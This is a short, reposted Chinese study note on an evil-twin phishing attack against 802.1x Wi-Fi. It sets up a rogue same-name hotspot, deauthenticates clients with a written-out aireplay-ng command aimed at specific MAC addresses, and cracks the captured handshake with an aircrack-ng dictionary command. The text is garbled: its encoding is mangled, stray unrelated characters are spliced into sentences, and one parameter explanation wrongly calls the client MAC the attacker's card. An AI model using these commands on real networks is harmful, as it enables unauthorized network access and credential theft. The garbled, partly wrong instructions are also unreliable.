轉(zhuǎn)自bobao.#/learning/detail/4178.html
第一次學(xué)習(xí)無線滲透的知識
目標:針對802.1x認證的釣魚攻擊
利用hostapd建立同名的802.1x釣魚熱點德频,同時用aireply-ng發(fā)送deauth包,使周圍連接過此熱點的人都嘗試連接釣魚熱點型凳。
進行Deauth驗證攻擊,強制斷開合法無線客戶端和AP直接的連接,使其重新進行連接
具體步驟和方法:轉(zhuǎn)自ixuehua.blog.163.com/blog/static/259952038201646114358442/
其中赛惩,重要的一步型宙,利用aireply-ng使已經(jīng)連接的客戶端斷開并重新連接红伦,以產(chǎn)生握手包持钉。
aireplay-ng-00-a C8:3A:35:43:FE:60-c C4:8E:8F:61:18:DB wlan0mon
參數(shù)解釋: -0?Deautenticate攻擊模式 ?0代表無限次
-a 目標ap的mac
-c ?攻擊者網(wǎng)卡mac
5.跑包(破解)
aircrack-ng-w/root/Desktop/pwd.txt testAP-03.cap
參數(shù)說明: -w ?字典路徑 + 數(shù)據(jù)包